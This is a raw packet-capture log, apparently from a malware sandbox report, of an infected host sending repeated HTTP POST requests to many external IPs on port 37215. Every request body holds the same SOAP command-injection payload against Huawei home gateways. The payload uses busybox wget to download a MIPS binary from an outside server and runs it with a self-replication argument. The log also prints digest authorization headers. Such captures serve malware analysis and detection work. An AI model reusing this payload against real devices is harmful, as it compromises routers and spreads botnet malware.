                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1980192.168.2.2341666185.61.148.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591342926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1981192.168.2.235713441.127.19.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591348886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1982192.168.2.2360146197.45.217.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591353893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1983192.168.2.23594102.215.218.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592473030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1984192.168.2.2356394197.241.59.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592483997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1985192.168.2.234470023.38.131.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592542887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1986192.168.2.2344400168.241.229.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592780113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1987192.168.2.234835641.135.79.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592782021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1988192.168.2.2344288171.148.26.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592803955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1989192.168.2.2360106157.158.46.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592900038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
